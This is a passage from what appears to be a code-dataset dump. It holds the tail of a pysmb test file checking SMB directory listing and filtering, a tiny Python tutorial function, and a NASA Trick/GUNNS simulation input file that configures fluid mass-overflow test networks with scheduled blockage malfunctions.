    entries = [(r.filename, r.isDirectory) for r in results]
    for item in [('Test File.txt', False), ('Test Folder', True), ('子文件夹', True)]:
        assert item in entries
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathWithManyFiles_SMB2():
    """A directory holding 999 RFC files must be listed completely over SMB2."""
    global conn
    results = conn.listPath('smbtest', '/RFC Archive/')
    entries = [(r.filename, r.isDirectory) for r in results]
    assert len(entries) == 999
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterForDirectory_SMB1():
    """Filtering with SMB_FILE_ATTRIBUTE_DIRECTORY must return only directories."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_DIRECTORY)
    # Bug fix: the original built a one-shot map iterator, consumed it with
    # len(list(...)), then looped over the exhausted iterator — so the
    # per-entry isDirectory assertions never executed. Materialize once.
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) > 0
    for f, isDirectory in filenames:
        assert isDirectory
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterForDirectory_SMB2():
    """Filtering with SMB_FILE_ATTRIBUTE_DIRECTORY must return only directories (SMB2)."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_DIRECTORY)
    # Bug fix: the original's map iterator was exhausted by len(list(...)),
    # so the for-loop below never ran. Materialize into a real list.
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) > 0
    for f, isDirectory in filenames:
        assert isDirectory
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterForFiles_SMB1():
    """Filtering for file attributes must return only non-directory entries."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_READONLY | SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM | SMB_FILE_ATTRIBUTE_ARCHIVE | SMB_FILE_ATTRIBUTE_INCL_NORMAL)
    # Bug fix: the original's map iterator was exhausted by len(list(...)),
    # so the per-entry assertions below were dead code. Materialize once.
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) > 0
    for f, isDirectory in filenames:
        assert not isDirectory
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterForFiles_SMB2():
    """Filtering for file attributes must return only non-directory entries (SMB2)."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', search = SMB_FILE_ATTRIBUTE_READONLY | SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM | SMB_FILE_ATTRIBUTE_ARCHIVE | SMB_FILE_ATTRIBUTE_INCL_NORMAL)
    # Bug fix: the original's map iterator was exhausted by len(list(...)),
    # so the per-entry assertions below were dead code. Materialize once.
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) > 0
    for f, isDirectory in filenames:
        assert not isDirectory
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterPattern_SMB1():
    """Wildcard 'Test*' must match exactly the two 'Test...' entries."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = 'Test*')
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) == 2
    assert ( u'Test File.txt', False ) in filenames
    assert ( u'Test Folder', True ) in filenames
    assert ( u'子文件夹', True ) not in filenames
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterPattern_SMB2():
    """Wildcard 'Test*' must match exactly the two 'Test...' entries (SMB2)."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = 'Test*')
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) == 2
    assert ( u'Test File.txt', False ) in filenames
    assert ( u'Test Folder', True ) in filenames
    assert ( u'子文件夹', True ) not in filenames
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterUnicodePattern_SMB1():
    """A unicode wildcard must match only the unicode folder."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = u'*件夹')
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) == 1
    assert ( u'Test File.txt', False ) not in filenames
    assert ( u'Test Folder', True ) not in filenames
    assert ( u'子文件夹', True ) in filenames
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterUnicodePattern_SMB2():
    """A unicode wildcard must match only the unicode folder (SMB2)."""
    global conn
    results = conn.listPath('smbtest', '/Test Folder with Long Name', pattern = u'*件夹')
    filenames = [(r.filename, r.isDirectory) for r in results]
    assert len(filenames) == 1
    assert ( u'Test File.txt', False ) not in filenames
    assert ( u'Test Folder', True ) not in filenames
    assert ( u'子文件夹', True ) in filenames
@with_setup(setup_func_SMB1)
@with_teardown(teardown_func)
def test_listPathFilterEmptyList_SMB1():
    """A pattern matching nothing must yield an empty listing."""
    global conn
    results = conn.listPath('smbtest', '/RFC Archive', pattern = '*.abc')
    filenames = [(r.filename, r.isDirectory) for r in results]
    # Bug fix: the original computed the listing but asserted nothing,
    # so the test could never fail. Verify the listing really is empty.
    assert filenames == []
@with_setup(setup_func_SMB2)
@with_teardown(teardown_func)
def test_listPathFilterEmptyList_SMB2():
    """A pattern matching nothing must yield an empty listing (SMB2)."""
    global conn
    results = conn.listPath('smbtest', '/RFC Archive', pattern = '*.abc')
    filenames = [(r.filename, r.isDirectory) for r in results]
    # Bug fix: the original computed the listing but asserted nothing,
    # so the test could never fail. Verify the listing really is empty.
    assert filenames == []
| 42.123656 | 225 | 0.712827 | 1,022 | 7,835 | 5.293542 | 0.098826 | 0.065065 | 0.041405 | 0.053235 | 0.95268 | 0.95268 | 0.94122 | 0.880592 | 0.880592 | 0.877634 | 0 | 0.014272 | 0.177281 | 7,835 | 185 | 226 | 42.351351 | 0.825008 | 0.041481 | 0 | 0.828221 | 0 | 0 | 0.1259 | 0.008002 | 0 | 0 | 0 | 0 | 0.269939 | 1 | 0.116564 | false | 0.01227 | 0.030675 | 0 | 0.147239 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
46a0c8277d9dff585c94fb4fc22cf64c6a9fbbc0 | 90 | py | Python | Python/Tutorial - 3/parameters.py | JC2295/FCC_Tutorial_Projects | 990e1221b2177acb9e4db0264adab518620404a0 | [
"MIT"
] | null | null | null | Python/Tutorial - 3/parameters.py | JC2295/FCC_Tutorial_Projects | 990e1221b2177acb9e4db0264adab518620404a0 | [
"MIT"
] | null | null | null | Python/Tutorial - 3/parameters.py | JC2295/FCC_Tutorial_Projects | 990e1221b2177acb9e4db0264adab518620404a0 | [
"MIT"
] | null | null | null | def par(x , y, z, i = 2, j = 4):
return x + y + z + i * j
print(par(1, 1, 1, 5, 5))
| 15 | 32 | 0.411111 | 22 | 90 | 1.681818 | 0.590909 | 0.108108 | 0.162162 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12069 | 0.355556 | 90 | 5 | 33 | 18 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d3b69cfb581836c09a06e150c02af111b65ba686 | 28,433 | py | Python | sims/SIM_mass_overflow/RUN_test/input.py | nasa/gunns | 248323939a476abe5178538cd7a3512b5f42675c | [
"NASA-1.3"
] | 18 | 2020-01-23T12:14:09.000Z | 2022-02-27T22:11:35.000Z | sims/SIM_mass_overflow/RUN_test/input.py | nasa/gunns | 248323939a476abe5178538cd7a3512b5f42675c | [
"NASA-1.3"
] | 39 | 2020-11-20T12:19:35.000Z | 2022-02-22T18:45:55.000Z | sims/SIM_mass_overflow/RUN_test/input.py | nasa/gunns | 248323939a476abe5178538cd7a3512b5f42675c | [
"NASA-1.3"
] | 7 | 2020-02-10T19:25:43.000Z | 2022-03-16T01:10:00.000Z | # @copyright Copyright 2019 United States Government as represented by the Administrator of the
# National Aeronautics and Space Administration. All Rights Reserved. */
#
#trick setup
trick.sim_services.exec_set_trap_sigfpe(1)
#simControlPanel = trick.SimControlPanel()
#trick.add_external_application(simControlPanel)
#trickView = trick.TrickView()
#trick.add_external_application(trickView)
#trick.real_time_enable()
trick.sim_services.exec_set_terminate_time(12)
trick.exec_set_software_frame(0.0125)
trick.TMM_reduced_checkpoint(False)
trick_mm.mm.set_expanded_arrays(True)
trick_sys.sched.set_enable_freeze(True)
#trick_sys.sched.set_freeze_command(True)
#---------------------------------------------
# Initial setup
#---------------------------------------------
# Override fluid14err volumes and pressures to be small to create a loop where all nodes are
# overflowing. Circulation is created by turning off the potential sources of all but the pot01
# link.
massOverflow.fluid14err.netInput.vol0.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.vol1.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.vol2.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.vol3.mInitialVolume = 1.0e-4
massOverflow.fluid14err.netInput.fluid0.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid1.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid2.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid3.mPressure = 100.0
massOverflow.fluid14err.netInput.fluid0.mTemperature = 294.261
massOverflow.fluid14err.netInput.fluid1.mTemperature = 294.261
massOverflow.fluid14err.netInput.fluid2.mTemperature = 294.261
massOverflow.fluid14err.netInput.fluid3.mTemperature = 294.261
massOverflow.fluid14err.netInput.pot02.mSourcePressure = 0.0
massOverflow.fluid14err.netInput.pot13.mSourcePressure = 0.0
massOverflow.fluid14err.netInput.pot23.mSourcePressure = 0.0
massOverflow.fluid14err.netConfig.pot01.mMaxConductivity = 0.001
massOverflow.fluid14err.netConfig.pot02.mMaxConductivity = 0.001
massOverflow.fluid14err.netConfig.pot13.mMaxConductivity = 0.001
massOverflow.fluid14err.netConfig.pot23.mMaxConductivity = 0.001
massOverflow.fluid12err.netInput.vol0.mInitialVolume = 1.0
massOverflow.fluid12err.netInput.vol1.mInitialVolume = 1.0e-6
massOverflow.fluid12err.netInput.vol2.mInitialVolume = 1.0e-4
massOverflow.fluid12err.netInput.fluid0.mPressure = 100.0
massOverflow.fluid12err.netInput.fluid1.mPressure = 100.0
massOverflow.fluid12err.netInput.fluid2.mPressure = 100.0
massOverflow.fluid12err.netInput.fluid0.mTemperature = 275.0
massOverflow.fluid12err.netInput.fluid1.mTemperature = 275.0
massOverflow.fluid12err.netInput.fluid2.mTemperature = 275.0
massOverflow.fluid35.netConfig.msorb13des.addCompound(trick.ChemicalCompound.CO2,0.1,0.85,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,True,0.0,0.1,1.0)
massOverflow.fluid35.netConfig.msorb13ad.addCompound(trick.ChemicalCompound.H2O,0.11,0.75,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,False,1.0,0.0,1.0)
massOverflow.fluid48.netConfig.msorb45de.addCompound(trick.ChemicalCompound.CO2,0.1,0.85,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,True,0.0,0.1,1.0)
massOverflow.fluid48.netConfig.msorb12ad.addCompound(trick.ChemicalCompound.H2O,0.11,0.75,0.0,0.05,0.01,-1.0,True,trick.ChemicalCompound.NO_COMPOUND,False,1.0,0.0,1.0)
massOverflow.fluid37.sub14.setHeatBalance(-10000.0)
# Configure sorbant segments in the GunnsFluidCdraAdsorber links
massOverflow.fluid41.cdra13.addSegment(0, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(1, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(2, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(3, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(4, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(5, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(6, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(7, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(8, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra13.addSegment(9, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(0, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(1, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(2, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(3, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(4, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(5, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(6, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(7, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(8, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
massOverflow.fluid41.cdra23.addSegment(9, trick.GunnsFluidCdraAdsorber.ZEO_5A_RK38, 0.0, 0.00216)
# Override fluid45over node 1 volume to be small so it will overflow.
massOverflow.fluid45over.netInput.vol1.mInitialVolume = 1.0e-4
#---------------------------------------------
# T-0 setup (block all flows)
#---------------------------------------------
massOverflow.fluid.netInput.cond01.mMalfBlockageFlag = True
massOverflow.fluid.netInput.cond13.mMalfBlockageFlag = True
massOverflow.fluid.netInput.cond02.mMalfBlockageFlag = True
massOverflow.fluid.netInput.cond23.mMalfBlockageFlag = True
massOverflow.fluid37.netInput.sub14.mMalfBlockageFlag = True
massOverflow.fluid37.netInput.sub14.mMalfBlockageValue = 1.0
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv1.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv2.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid6.vlv3.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv1.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathA.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathA.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathB.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid7.vlv2.mPathB.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.chk01.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.chk01.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.chk02.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.chk02.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.htch13.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.htch13.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid8.htch23.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid8.htch23.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc01.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc01.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc02.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxc02.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs13.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs13.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs23.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid9.hxs23.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.liqSource.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.liqSource.mMalfBlockageValue = 1.0""" )
trick.add_read(0.0, """massOverflow.fluid33.gasSource.mMalfBlockageFlag = True""" )
trick.add_read(0.0, """massOverflow.fluid33.gasSource.mMalfBlockageValue = 1.0""" )
#---------------------------------------------
# T+1 events (start all flows)
#---------------------------------------------
trick.add_read(1.0, """massOverflow.fluid.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid.cond13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid2.source13.setFlowDemand(0.1)""" )
trick.add_read(1.0, """massOverflow.fluid3.vlv01.setPosition(1.0)""" )
trick.add_read(1.0, """massOverflow.fluid3.vlv02.setPosition(1.0)""" )
trick.add_read(1.0, """massOverflow.fluid3.pipe13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid3.pipe23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.hx01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.hx02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.sensor13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid4.sensor23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid5.qd01.setState(trick.GunnsFluidSimpleQd.CONNECTED)""" )
trick.add_read(1.0, """massOverflow.fluid5.qd02.setState(trick.GunnsFluidSimpleQd.CONNECTED)""" )
trick.add_read(1.0, """massOverflow.fluid5.leak13.setMalfLeakHole(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid5.leak23.setMalfLeakHole(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv1.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv1.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv2.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv2.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv3.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid6.vlv3.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv1.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv1.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv2.mPathA.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid7.vlv2.mPathB.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid8.chk01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid8.chk02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid8.chk01.setMalfFailTo(True,1.0)""" )
#trick.add_read(1.0, """massOverflow.fluid8.htch13.mMalfBlockageFlag = False""" )
#trick.add_read(1.0, """massOverflow.fluid8.htch23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxc01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxc02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxs13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid9.hxs23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid10.pchg02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid10.pchg01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.prv01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.prv02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.ls13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid11.ls23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12.htch01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12.htch12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12err.htch01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid12err.htch12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid13.reg01.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid13.reg02.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid13.rel13.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid13.rel23.setMalfFailTo(True, 1.0)""" )
trick.add_read(1.0, """massOverflow.fluid14.pot01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14.pot02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14.pot13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14.pot23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid14err.pot23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid15.vlv32.setPosition(1.0)""" )
trick.add_read(1.0, """massOverflow.fluid16.src10.setFlowDemand(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid17.pot20.setSourcePressure(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid17.tank1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O, True, 200.0, 10.0)""" )
trick.add_read(1.0, """massOverflow.fluid18.pot20.setSourcePressure(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid18.bln1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O, True, 200.0, 10.0)""" )
trick.add_read(1.0, """massOverflow.fluid19.srck01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid19.srck13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid19.turb02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid19.turb23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfor01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfor02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfval13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid20.hfval23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid21.cont23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.jump01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.sock02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.jump13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid22.sock23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.gfan01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.gfan12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.lcp34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid24.lcp45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid23.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid23.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.pot30.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.sorb13des.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid25.sorb23des.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.evap14.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid26.pot20.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.cond34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.react45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.hreact45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.hreact12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid27.react12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.met0.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid28.netInput.met0.mNNominal = 2.0""")
trick.add_read(1.0, """massOverflow.fluid29.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid29.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid29.heat10.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid29.heat21.mMalfBlockageFlag = False""")
